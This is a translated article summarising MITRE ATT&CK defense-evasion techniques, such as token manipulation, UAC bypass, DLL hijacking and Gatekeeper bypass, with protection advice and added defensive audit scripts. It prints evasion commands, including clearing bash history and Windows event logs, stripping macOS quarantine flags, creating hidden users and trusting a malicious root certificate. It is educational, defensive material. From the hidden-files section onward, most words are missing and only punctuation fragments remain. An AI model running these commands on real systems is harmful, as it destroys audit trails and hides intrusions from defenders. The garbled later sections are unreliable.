
Studying Adversarial Tactics, Techniques & Common Knowledge (ATT&CK). Enterprise Tactics. Part 5

Defense Evasion


Links to all parts:
Part 1. Initial Access
Part 2. Execution
Part 3. Persistence
Part 4. Privilege Escalation
Part 5. Defense Evasion
Part 6. Credential Access
Part 7. Discovery
Part 8. Lateral Movement

The Defense Evasion section describes techniques an attacker uses to hide malicious activity and avoid detection by security controls. It also includes variants of techniques from other stages of the attack chain that help overcome specific defenses and preventive measures taken by the defending side. Defense evasion techniques are therefore used in every phase of an attack.

The author is not responsible for the possible consequences of applying the information contained in the article, and also apologizes for any inaccuracies in some formulations and terms. The published information is a free retelling of the content of MITRE ATT&CK.

Access Token Manipulation


System: Windows
Rights: User, Administrator
Description: Attackers can use access tokens to perform their actions in the security context of another user or of the system, thereby avoiding detection of the malicious activity. An adversary can use Windows API functions to copy access tokens from existing processes (token stealing); to do this it must already be running in the context of a privileged user (for example, an administrator). Token theft is typically used to elevate privileges from the administrator level to the System level. An adversary can also use an account's access token to authenticate to a remote system if that account has the necessary permissions there. There are three main ways to abuse access tokens.

Token theft and impersonation.
Token impersonation is the ability of the OS to run a thread in a security context different from that of the process the thread belongs to. In other words, impersonating a token allows actions to be performed on behalf of another user. An adversary can create a duplicate access token with the DuplicateTokenEx function and then use ImpersonateLoggedOnUser to make the calling thread run in the context of the logged-on user, or use SetThreadToken to assign the access token to a thread.

Creating a process with an access token.
An attacker can duplicate an access token with DuplicateTokenEx and then pass it to CreateProcessWithTokenW to create a new process running in the context of the impersonated user.

Obtaining and impersonating access tokens.
An adversary who has a username and password can create a logon session with the LogonUser API function, which returns a copy of the new session's access token, and then assign that token to a thread with SetThreadToken.
Metasploit Meterpreter and Cobalt Strike include tools for manipulating access tokens to elevate privileges.

Protection recommendations: To make full use of the techniques described above an attacker needs system administrator rights, so do not forget to limit the privileges of ordinary users. Any user can spoof access tokens if they have valid credentials. Restrict the users and groups allowed to create access tokens:

GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object.

Also determine who can replace the tokens of local or network service processes:
GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token.
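The two user rights above map to the privilege constants SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege. The following is an added example, not code from the article or from MITRE: it parses the [Privilege Rights] section of a file produced with `secedit /export /cfg rights.inf` and reports accounts holding those rights beyond the defaults assumed here (nobody for SeCreateTokenPrivilege; LOCAL SERVICE and NETWORK SERVICE for SeAssignPrimaryTokenPrivilege). The export text below is constructed.

```python
"""Audit who holds token-related user rights in a secedit export.

Added example, not part of the original article. It parses the
[Privilege Rights] section of `secedit /export /cfg rights.inf` output and
flags holders of SeCreateTokenPrivilege ("Create a token object") and
SeAssignPrimaryTokenPrivilege ("Replace a process level token") that are
not in the expected default set. The sample export below is constructed.
"""

# Assumed defaults: nobody should hold SeCreateTokenPrivilege, and
# SeAssignPrimaryTokenPrivilege is normally held only by LOCAL SERVICE
# (S-1-5-19) and NETWORK SERVICE (S-1-5-20).
EXPECTED = {
    "SeCreateTokenPrivilege": set(),
    "SeAssignPrimaryTokenPrivilege": {"*S-1-5-19", "*S-1-5-20"},
}

# Constructed sample of a secedit export (only the relevant sections).
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1005
SeCreateTokenPrivilege = *S-1-5-21-1111-2222-3333-1005
SeDebugPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: set(holders)} from the [Privilege Rights] section."""
    rights = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, holders = line.partition("=")
        rights[name.strip()] = {h.strip() for h in holders.split(",") if h.strip()}
    return rights


def find_unexpected_holders(rights, expected=EXPECTED):
    """Return {privilege: sorted(unexpected holders)} for the audited rights."""
    findings = {}
    for priv, allowed in expected.items():
        extra = rights.get(priv, set()) - allowed
        if extra:
            findings[priv] = sorted(extra)
    return findings


if __name__ == "__main__":
    rights = parse_privilege_rights(SAMPLE_INF)
    for priv, holders in find_unexpected_holders(rights).items():
        print(f"{priv}: unexpected holders {holders}")
```

Holders appear in the export as SIDs prefixed with `*`; resolving them to account names is left to the reader's environment.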

BITS Jobs


System: Windows
Rights: User, Administrator, System
Description: Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through the Component Object Model (COM). BITS is commonly used by updaters, instant messengers and other applications that prefer to work in the background without interrupting other network applications. File transfers are represented as BITS jobs, each containing a queue of one or more file operations. The interface for creating and managing BITS jobs is available in PowerShell and in the BITSAdmin tool. Attackers can use BITS to download, execute and clean up after running malicious code. BITS jobs are stored independently in the BITS database, no new files or registry entries are created on the system, and BITS is often allowed through the firewall. BITS jobs can also be used to gain a foothold in the system by creating long-lived jobs (90 days by default) or by invoking an arbitrary program when a job completes or fails (including after an OS restart).

Protection recommendations: BITS is standard OS functionality whose use is hard to distinguish from malicious activity, so protection should focus on preventing the attacker from launching tools at the beginning of the attack chain. Completely disabling BITS may break updates of legitimate software, but you can consider restricting access to the BITS interface for specific users and groups, and you can also limit the lifetime of BITS jobs, which is set by changing the following keys:


Binary Padding


System: Windows, Linux, macOS
Description: Some security tools scan files by looking for static signatures. Adversaries can append data to malicious files to push their size above the maximum file size a scanner will examine, or to change the file's hash so as to bypass hash-based blocklists that prevent files from running.

Protection recommendations: Identify potentially dangerous software with tools such as AppLocker, whitelisting tools and software restriction policies.
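As an added illustration (not code from the article), the block below shows why a hash blocklist alone is weak against padding and what a cheap complementary check looks like: appending filler changes the SHA-256, so the padded copy is no longer blocklisted, but the long run of identical trailing bytes is easy to spot. The "executable" bytes and the blocklist are constructed.

```python
"""Binary padding seen from the defender's side.

Added example, not from the original article. Appending filler to a file
changes its SHA-256 (so a hash blocklist misses it); a simple trailing-run
check still flags the padded copy. Sample bytes and blocklist are constructed.
"""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def pad(data: bytes, filler: bytes, size: int) -> bytes:
    """Append `size` bytes of `filler` (repeated) after the real content."""
    return data + (filler * size)[:size]


def is_blocklisted(data: bytes, blocklist: set) -> bool:
    return sha256(data) in blocklist


def trailing_run_ratio(data: bytes) -> float:
    """Fraction of the file made up of one repeated byte value at its end.
    Legitimate binaries rarely end in a very long run of identical bytes."""
    if not data:
        return 0.0
    last = data[-1]
    run = 0
    for b in reversed(data):
        if b != last:
            break
        run += 1
    return run / len(data)


def looks_padded(data: bytes, threshold: float = 0.5) -> bool:
    return trailing_run_ratio(data) >= threshold


# Constructed sample: a short fake payload and a blocklist holding its hash.
ORIGINAL = b"MZ\x90\x00" + b"constructed-sample-payload" * 4
BLOCKLIST = {sha256(ORIGINAL)}
PADDED = pad(ORIGINAL, b"\x00", 10 * len(ORIGINAL))

if __name__ == "__main__":
    print("original blocklisted:", is_blocklisted(ORIGINAL, BLOCKLIST))
    print("padded blocklisted:  ", is_blocklisted(PADDED, BLOCKLIST))
    print("padded looks padded: ", looks_padded(PADDED))
```

The run check is deliberately simple; padding with random bytes defeats it, which is one more reason the article's recommendation is allow-listing by publisher rather than blocklisting by hash.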

Bypass User Account Control


System: Windows
Rights: User, Administrator
Description: There are many ways to bypass UAC, the most common of which are implemented in the UACMe project. New UAC bypasses are found regularly, such as abuse of the eventvwr.exe system application, which can run a binary or script with elevated privileges. Malware can also inject into trusted processes for which UAC allows privilege elevation without prompting the user.

To bypass UAC via eventvwr.exe, the following Windows registry key is modified:
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command

To bypass UAC via sdclt.exe, the following Windows registry keys are modified:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command\isolatedCommand

Protection recommendations: Remove users from the local Administrators group on protected systems. If possible, set UAC to its highest protection level.

CMSTP


System: Windows
Rights: User
Description: Microsoft Connection Manager Profile Installer (cmstp.exe) is built into Windows. cmstp.exe accepts an INF file as a parameter, so an attacker can prepare a malicious INF that loads and executes DLLs or scriptlets (*.sct) from remote servers, bypassing AppLocker and other restrictions, because cmstp.exe is signed with a Microsoft digital certificate.

Protection recommendations: Block the launch of potentially dangerous applications. Monitor or completely block execution of C:\Windows\System32\cmstp.exe.

Clear Command History


System: Linux, macOS
Rights: User
Description: For users' convenience, macOS and Linux systems log all commands the user runs in the terminal, so a command run earlier can quickly be re-executed in another session. During the session the command history is kept in the file named by the HISTFILE variable; when the user logs out it is written to ~/.bash_history in the user's home directory. The history file may also contain passwords the user typed in clear text. Criminals can either search command history files for passwords or take steps to stop their malicious activity from being recorded in the history, for example:

unset HISTFILE
export HISTFILESIZE=0
history -c
rm ~/.bash_history

Protection recommendations: Preventing users from deleting or overwriting bash_history files stops the adversary from abusing them, and restricting users' ability to edit the HISTFILE and HISTFILESIZE variables ensures that the command log is preserved.

Code Signing


System: Windows, macOS
Description: A digital code signature authenticates the developer and guarantees that the file has not been modified. However, adversaries can use signatures to disguise malware as legitimate binaries. Code-signing certificates can be created, forged or stolen by an attacker. Code signing as a first check of software is used on Windows, macOS and OS X, and is not used on Linux because of the platform's decentralized nature. Code-signing certificates can be used to bypass security policies that allow only signed code to run on the system.

Protection recommendations: Application whitelisting and restricting the set of trusted software publishers before relying on a digital signature can prevent malicious or untrusted code from running on the protected system.

Component Firmware


System: Windows
Rights: System
Description: Some attackers can use sophisticated tools to compromise computer components and install malicious firmware on them, which runs malicious code outside the operating system and even outside the main system firmware (BIOS). The technique targets the firmware of components that have no built-in integrity checking, such as hard drives. A device with malicious firmware can provide persistent access to the attacked system despite failures and even overwriting of the hard disk. The technique is designed to defeat software protection and integrity controls.

Component Object Model Hijacking


System: Windows
Rights: User
Description: Microsoft Component Object Model (COM) is a technology for building software from interacting object components, each of which can be used by many programs at once. Attackers can use COM to insert malicious code that is executed in place of legitimate code by hijacking COM references. To hijack a COM object, the reference to the legitimate system component in the Windows registry is replaced; any subsequent call of that component then executes the malicious code.

Protection recommendations: Preventive measures against this attack are not recommended, since COM objects are part of the OS and of installed software, and blocking changes to COM objects can affect the stability of the operating system and applications. It is recommended to direct protection efforts at blocking malware and potentially dangerous software.

Control Panel Items


System: Windows
Rights: User, Administrator, System
Description: The technique is the use of Windows Control Panel items by attackers to execute arbitrary commands as a payload (for example, the Reaver malware). Malicious objects can be disguised as standard Control Panel items and delivered to the system in phishing attachments. Utilities for viewing and configuring Windows settings are registered EXE files and CPL files of Control Panel items. CPL files are in fact renamed DLLs, which can be run in the following ways:


Registered CPLs stored in System32 are automatically displayed in the Windows Control Panel and have a unique identifier stored in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace

Information about other CPLs, for example the display name and the path to the .cpl file, is stored in the "Cpls" and "Extended Properties" subkeys of:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel

Some CPLs are registered as shell extensions under:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\shellex\PropertySheetHandlers

Protection recommendations: Restrict the launch and storage of Control Panel item files to protected folders only (for example, C:\Windows\System32), enable User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system, and of course use anti-virus software.
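The UAC bypass, COM hijacking and Control Panel Items sections above all come down to registry keys that a defender can audit. The block below is an added example, not code from the article or from any of the tools it mentions: it parses a text export in .reg format (what `reg export` or regedit produce) and applies three checks taken from those sections: the HKCU keys abused by the eventvwr.exe and sdclt.exe bypasses should not exist for a normal user; a CLSID whose InprocServer32 is defined under HKCU as well as HKLM shadows the machine-wide COM server; entries in the "Cpls" key should point into C:\Windows\System32. The .reg content is constructed, including the CLSID.

```python
"""Registry export audit for UAC-bypass keys, COM hijacks and stray CPLs.

Added example, not part of the original article. Parses a .reg text export
(string values only) and applies three checks described in the article.
The export below, including the CLSID and paths, is constructed.
"""
import re

UAC_BYPASS_KEYS = {
    r"HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe",
    r"HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command",
}
CPLS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
CLSID_RE = re.compile(
    r"^(HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\Software\\Classes\\CLSID\\"
    r"(\{[0-9A-Fa-f-]+\})\\InprocServer32$", re.I)

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
@="C:\\Users\\bob\\AppData\\Local\\Temp\\updater.exe"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Windows\\System32\\legit.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Users\\bob\\AppData\\Roaming\\shadow.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls]
"Settings"="C:\\Windows\\System32\\inetcpl.cpl"
"Helper"="C:\\Users\\Public\\helper.cpl"
"""


def parse_reg(text):
    """Return {key_path: {value_name: value}} for string values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            # .reg doubles backslashes inside quoted strings; undo that.
            keys[current][name] = value.strip('"').replace("\\\\", "\\")
    return keys


def find_uac_bypass_keys(keys):
    """Keys from UAC_BYPASS_KEYS that exist in the export (case-insensitive)."""
    present = {k.lower() for k in keys}
    return sorted(k for k in UAC_BYPASS_KEYS if k.lower() in present)


def find_com_hijacks(keys):
    """CLSIDs whose HKCU InprocServer32 differs from the HKLM one."""
    servers = {"HKEY_LOCAL_MACHINE": {}, "HKEY_CURRENT_USER": {}}
    for key, values in keys.items():
        m = CLSID_RE.match(key)
        if m:
            servers[m.group(1).upper()][m.group(2).upper()] = values.get("(Default)", "")
    hklm, hkcu = servers["HKEY_LOCAL_MACHINE"], servers["HKEY_CURRENT_USER"]
    return {c: (hklm[c], hkcu[c]) for c in hkcu
            if c in hklm and hkcu[c].lower() != hklm[c].lower()}


def find_cpls_outside_system32(keys, system32=r"C:\Windows\System32"):
    """Cpls entries whose path is not under System32."""
    cpls = next((v for k, v in keys.items() if k.lower() == CPLS_KEY.lower()), {})
    prefix = system32.lower() + "\\"
    return {n: p for n, p in cpls.items() if not p.lower().startswith(prefix)}


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    print("UAC bypass keys present:", find_uac_bypass_keys(parsed))
    print("COM hijacks:", find_com_hijacks(parsed))
    print("CPLs outside System32:", find_cpls_outside_system32(parsed))
```

Only REG_SZ values are handled, which is enough for these three checks; binary and DWORD values are stored as their raw text.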

DCShadow


System: Windows
Rights: Administrator
Description: DCShadow involves creating a fake domain controller in the attacked network, with which an attacker can change AD data, including any domain object, credentials and keys, unnoticed by SIEM systems, by using the API functions for interacting with the attacked DC. Tooling for the attack is part of mimikatz. DCShadow can be used to perform SID-History injection attacks and to create backdoors for further persistence in the system.

Protection recommendations: Since the DCShadow technique abuses design features of AD, protection should be aimed at preventing the launch of attack tools. An attack can be detected by analyzing DC replication network traffic, which runs every 15 minutes but can be triggered out of schedule by an attacker.

DLL Search Order Hijacking


System: Windows
Rights: User, Administrator, System
Description: The technique exploits weaknesses in the algorithm applications use to locate the DLL files they need (MSA2269637). Often the DLL search directory is the program's working directory, so attackers can replace the original DLL with a malicious one of the same file name.

Remote attacks on the DLL search can occur when a program sets its current directory to a remote location, for example a network share. Attackers can also directly change how a DLL is found and loaded by replacing the .manifest or .local files that describe the DLL search parameters. If the attacked program runs with high privileges, the malicious DLL it loads will also run with high rights; in this case the technique can be used to escalate privileges from user to administrator or System.

Protection recommendations: Disable remote DLL loading (enabled by default in Windows Server 2012+ and available via updates for XP+ and Server 2003+). Enable safe DLL search mode, which puts restricted directories such as %SYSTEMROOT% ahead of less restricted local directories (such as the current working directory) in the DLL search order.

Enable safe DLL search:
Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.
Corresponding registry key:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

Consider auditing the protected system for DLL weaknesses with tools such as the PowerUp module of PowerSploit. Do not forget about blocking malicious and potentially dangerous software, and about implementing Microsoft's recommendations.
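To make the effect of SafeDllSearchMode concrete, here is an added example (not code from the article or from PowerSploit) that models the documented default search order for desktop applications and resolves a DLL name against a constructed set of existing files. With safe mode off, a DLL planted in the current working directory (here a network share) is found before the System32 copy; with safe mode on, the System32 copy wins; a DLL planted in the application's own directory wins either way, which is why the article also recommends write-protected installation directories. KnownDLLs, which the loader always takes from System32, are not modelled; all paths and the DLL name are constructed.

```python
"""Model of the Windows DLL search order with and without SafeDllSearchMode.

Added example, not part of the original article. Directory order follows the
documented default search order for desktop applications; KnownDLLs are not
modelled. All paths and the DLL name are constructed.
"""


def search_order(app_dir, cwd, safe_mode, system32=r"C:\Windows\System32",
                 windows=r"C:\Windows", path_dirs=()):
    """Directories in the order Windows probes them for a DLL name."""
    system_dirs = [system32, r"C:\Windows\System", windows]
    if safe_mode:
        # SafeDllSearchMode=1: the current directory drops below the system dirs.
        return [app_dir, *system_dirs, cwd, *path_dirs]
    # SafeDllSearchMode=0: the current directory comes right after the app dir.
    return [app_dir, cwd, *system_dirs, *path_dirs]


def resolve_dll(name, present, app_dir, cwd, safe_mode, **kw):
    """present: set of full paths where a file called `name` exists.
    Returns the first path the loader would pick, or None if none exists."""
    present_lc = {p.lower() for p in present}
    for d in search_order(app_dir, cwd, safe_mode, **kw):
        candidate = d.rstrip("\\") + "\\" + name
        if candidate.lower() in present_lc:
            return candidate
    return None


# Constructed scenario: program in Program Files, current directory set to a
# network share, and a DLL of the same name as a System32 DLL on that share.
APP_DIR = r"C:\Program Files\Vendor\App"
CWD = r"\\fileserver\public"
PRESENT = {r"C:\Windows\System32\helper.dll", r"\\fileserver\public\helper.dll"}

if __name__ == "__main__":
    for safe in (False, True):
        print(f"SafeDllSearchMode={int(safe)}:",
              resolve_dll("helper.dll", PRESENT, APP_DIR, CWD, safe))
```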

DLL Side-Loading


System: Windows
Description: The attack relies on weaknesses in Side-by-Side (WinSxS or SxS) technology, whose purpose is to let applications run with incompatible versions of the same code components. The component assembly store is located in C:\Windows\WinSxS. Each assembly must have an associated manifest, an XML file with information about the assembly's files, classes, interfaces, libraries and other elements. As with DLL search order hijacking, adversaries can cause a user application to side-load a malicious DLL whose path is given in the assembly manifest file.

%TEMP%\RarSFX%\%ALLUSERSPROFILE%\SXS;
%TEMP%\RarSFX%\%ALLUSERSPROFILE%\WinSxS.

Protection recommendations: Update software regularly and install applications in write-protected directories. Use the sxstrace.exe program to check manifest files for side-loading weaknesses.

Deobfuscate/Decode Files or Information


System: Windows
Rights: User
Description: Attackers can use obfuscated files and information to hide malicious code and artifacts left over from an intrusion. To use such files, adversaries apply the reverse techniques to deobfuscate or decode them. This may involve malware, various scripts or system utilities; for example, there is a known method of using the certutil utility to decode an executable of a remote access tool hidden inside a certificate file. Another example is using the copy /b command to assemble binary fragments into a payload.

Payload files can be compressed, archived or encrypted to avoid detection. Sometimes deobfuscation or decryption requires user action (User Execution): the user may need to enter a password to open a compressed or encrypted file or script with malicious content.

Protection recommendations: Identify and block unnecessary system utilities or potentially dangerous software that can be used to deobfuscate or decrypt files, using tools such as AppLocker and software restriction policies.

Disabling Security Tools


System: Windows, Linux, macOS
Description: Attackers can disable security tools, kill event logging processes, delete registry keys, prevent security tools from starting while malicious activity is under way, or use other methods to interfere with security scanners or event reporting.

Protection recommendations: Ensure that permissions on processes, the registry and files are configured correctly so that security features cannot be disabled or tampered with without authorization.

Exploitation for Defense Evasion


System: Windows, Linux, macOS
Rights: User
Description: Like any software, security products may have vulnerabilities that an attacker can exploit to disable or bypass them.

Protection recommendations: Regular software updates and the development and implementation of a vulnerability management process. Virtualization and application micro-segmentation can reduce the risk of such vulnerabilities being exploited.

Extra Window Memory Injection


System: Windows
Rights: Administrator, System
Description: The technique abuses additional window memory, the so-called Extra Window Memory (EWM). EWM is 40 bytes in size, enough to hold a 32-bit pointer, and is often used to reference procedures. During the attack chain, malware can place a pointer to malicious code in EWM, which is then invoked by the process of the infected application.

Protection recommendations: Since EWM injection abuses OS design features, protection efforts should be directed at preventing the launch of malicious programs and tools. It is good practice to identify and block potentially dangerous software with AppLocker, application whitelisting or Software Restriction Policies.

File Deletion


System: Windows, Linux, macOS
Rights: User
Description: The various tools, malware and other files an adversary uses can leave traces of the intrusion on the system. Attackers can delete these artifacts during an intrusion to reduce the chance of detection, or at the end of their operation. An adversary can use dedicated secure-deletion tools (for example, Windows Sysinternals SDelete) as well as tools built into the OS, such as del and cipher.

Protection recommendations: Where possible, block the launch of unnecessary system utilities, third-party tools and potentially dangerous software that can be used to destroy files.

File System Logical Offsets


System: Windows
Rights: Administrator
Description: Windows can allow programs direct access to logical volumes. Programs with direct access can read and write files directly on the hard disk by parsing the file system's data structures, bypassing file access controls and file system monitoring. Utilities such as NinjaCopy perform these actions from PowerShell.

Protection recommendations: Block potentially dangerous software.

Gatekeeper Bypass


System: macOS
Rights: User, Administrator
Description: macOS and OS X use Gatekeeper to ensure that only trusted software is launched. When an application is downloaded from the Internet, a special com.apple.quarantine attribute is set on the file, telling Gatekeeper to ask the user for permission before executing it. The flag is set before the file is saved to disk; when the user then tries to open the file, Gatekeeper checks for the flag and, if it is present, prompts the user to confirm the launch and shows the URL the file was downloaded from. Applications copied to the system from a USB drive, optical disc, external or network drive do not receive the com.apple.quarantine flag. Some utilities and files that land on the attacked system via a drive-by compromise also do not trigger the Gatekeeper flag, thereby bypassing the trust check. The presence of the quarantine flag can be checked with the command: xattr /path/to/MyApp.app

The flag can also be removed with xattr, but this requires elevated privileges:
sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app

Protection recommendations: In addition to Gatekeeper, consider prohibiting the launch of applications downloaded from outside the App Store.

HISTCONTROL variable


System: Linux, macOS
Rights: User
Description: The HISTCONTROL environment variable holds a list of options controlling how command history is saved to ~/.bash_history when the user logs off. For example, the ignorespace option means that lines beginning with a space are not saved, and ignoredups disables saving consecutive repeated commands. On some Linux systems the default is ignoreboth, which combines the two. This means that the command " ls" (with a leading space) will not be saved in history, unlike "ls".

HISTCONTROL is not used by default on macOS but can be set by the user. Attackers can exploit HISTCONTROL to leave no trace of their activity simply by putting a space in front of commands.

Protection recommendations: Prevent users from changing the HISTCONTROL variable, and make sure HISTCONTROL is set to ignoredups and does not contain the ignoreboth or ignorespace options.
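The Clear Command History section above and this HISTCONTROL section describe settings a defender can audit in users' shell startup files. The block below is an added example, not code from the article: it scans shell-config lines for the items the article names (unset HISTFILE, HISTFILESIZE=0, history -c, deleting ~/.bash_history, HISTCONTROL containing ignorespace or ignoreboth) and, going a little beyond the text, for HISTSIZE=0, HISTFILE=/dev/null and `set +o history`, which have the same effect. The sample ~/.bashrc lines are constructed.

```python
"""Audit shell startup files for history-evasion settings.

Added example, not from the original article. Checks the items the article
names plus HISTSIZE=0, HISTFILE=/dev/null and `set +o history`, which have
the same effect. Input lines are constructed.
"""
import re

ASSIGN_RE = re.compile(r"^(?:export\s+)?(HISTFILE|HISTFILESIZE|HISTSIZE|HISTCONTROL)=(.*)$")


def check_line(line):
    """Return a list of findings for one shell-config line."""
    s = line.split("#", 1)[0].strip()   # drop comments, leading spaces
    findings = []
    if not s:
        return findings
    if re.match(r"^unset\s+HISTFILE\b", s):
        findings.append("HISTFILE unset: history will not be written")
    if re.match(r"^set\s+\+o\s+history\b", s):
        findings.append("history recording turned off")
    if re.match(r"^history\s+-c\b", s):
        findings.append("in-memory history cleared")
    if re.match(r"^rm\s+(-\w+\s+)*.*\.bash_history\b", s):
        findings.append("history file deleted")
    m = ASSIGN_RE.match(s)
    if m:
        var, val = m.group(1), m.group(2).strip().strip("'\"")
        if var in ("HISTFILESIZE", "HISTSIZE") and val == "0":
            findings.append(f"{var}=0: history truncated")
        elif var == "HISTFILE" and val in ("", "/dev/null"):
            findings.append("HISTFILE points nowhere")
        elif var == "HISTCONTROL":
            opts = set(val.split(":"))
            if opts & {"ignorespace", "ignoreboth"}:
                findings.append("HISTCONTROL hides space-prefixed commands")
    return findings


def audit(lines):
    """Return [(line_number, line, finding)] over all lines."""
    out = []
    for n, line in enumerate(lines, 1):
        for f in check_line(line):
            out.append((n, line.rstrip(), f))
    return out


# Constructed sample ~/.bashrc: the first lines are benign, the rest are not.
SAMPLE_BASHRC = """\
# constructed ~/.bashrc
export HISTCONTROL=ignoredups
export HISTSIZE=1000
alias ll='ls -la'
 export HISTFILESIZE=0
unset HISTFILE
HISTCONTROL=ignoreboth
set +o history
history -c
rm -f ~/.bash_history
"""

if __name__ == "__main__":
    for n, line, f in audit(SAMPLE_BASHRC.splitlines()):
        print(f"line {n}: {f}: {line}")
```

The same checks apply to /etc/profile, /etc/bash.bashrc and ~/.bash_profile; run them as part of a configuration baseline rather than once.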

Hidden Files and Directories


System: Windows, Linux, macOS
Rights: User
Description: On Windows, users can hide files with the attrib command: attrib +h <file name> hides the file, and +s marks it as a system file. With the /S parameter attrib applies the change recursively. On Linux and macOS, users can hide files and folders simply by putting a "." at the start of the name; such files and folders are then hidden from Finder and from utilities such as ls.

On macOS, files can also be marked with the UF_HIDDEN flag, which hides them in Finder.app but does not hide them in Terminal.app. Many applications create hidden files and folders so as not to clutter the user's workspace; for example, SSH utilities create a hidden .ssh folder holding the list of known hosts and user keys.

Attackers can use the ability to hide files and folders so as not to attract users' attention.

: — .

Hidden Users


: macOS
: , root
: macOS userID, . /Library/Preferences/com.apple.loginwindow Hide500Users , 500 . , <500 Hide500Users :

sudo dscl . -create /Users/username UniqueID 401
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUE


: , . , /Library/Preferences/com.apple.loginwindow.

Hidden Window


: macOS
:
: macOS OS X plist- . apple.awt.UIElement Java- Dock. , , .

: , plist- apple.awt.UIElement.

Image File Execution Options Injection


System: Windows
: , System
: Image File Execution Options (IFEO) , :


, [executable] , . IFEO , , .

: , - , , . IFEO- . Debug_process Debug_only_this_process .

Indicator Blocking


System: Windows
: , . , .

, . , , , , , .

: , , . , .

Indicator Removal from Tools


System: Windows, Linux, macOS
: , (), , , , . . , - / , , .

: . , .

- , AppLocker .

. IDS-, .. , «» . , , , .

Indicator Removal on Host


System: Windows, Linux, macOS
: , , , . , Windows Event Linux/macOS, /.bash_history .var/log/*.

, , , , . - .

Windows Event Logs
Windows Event Logs — . Microsoft « , ». : , .
, , , , .. , .
:
wevtutil cl system;
wevtutil cl application;
wevtutil cl security.

, PowerShell.

: , . , . , , , . . 1102: « ».

Indirect Command Execution


System: Windows
:
: Windows, cmd. , Forfiles, (pcalua.exe), Windows Linux (WSL), , «» .

, , , , CMD.

: - AppLocker . , .

Install Root Certificate


System: Windows, Linux, macOS
: ,
: (CA). , . TLS/SSL -. , , . .

. , HTTPS -, .
« » , TLS/SSL.
. , .

macOS Ay MaMi /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System/keychain path/to/malicious/cert .

: HTTP Public Key Pinning (HPKP) — . HPKP , , .

Windows (HKCU):

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots\Flags = 1.

, . Microsoft authroot.stl. Sysinternals Sigcheck (Sigcheck[64].exe -tuv) Microsoft Certificate Trust List.

:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \SOFTWARE[\Policies]\Microsoft\SystemCertificates\Root\Certificates


Windows- , :

• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
• 7F88CD7223F3C813818C994614A89C99FA3B5247;
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
• A43489159A520F0D93D032CCAF37E7FE20A8B419;
• BE36A4562FB2EE05DBB3D32323ADF445084ED656;
• CDD4EEAE6000AC7F40C3802C171E30148030C072.

InstallUtil


System: Windows
:
: InstallUtil — Windows, , .NET Framework. Installutil VisualStudio. InstallUtil.exe Microsoft :

C:\Windows\Microsoft.NET\Framework\v[version]\InstallUtil.exe

InstallUtil - .

: InstallUtil, InstallUtil.exe.

LC_MAIN Hijacking


: macOS
: ,
: OS X 10.8 mach-O LC_MAIN, . LC_THREAD LC_UNIXTHREAD. , , . , .

: , . LC_MAIN .

Launchctl


: macOS
: ,
: Launchctl — Launchd. C Launchctl (LaunchDeamons LaunchAgents), . Launchctl , :

launchctl submit -l [labelname] -- /Path/to/thing/to/execute "arg" "arg" "arg"

, launchctl , , .

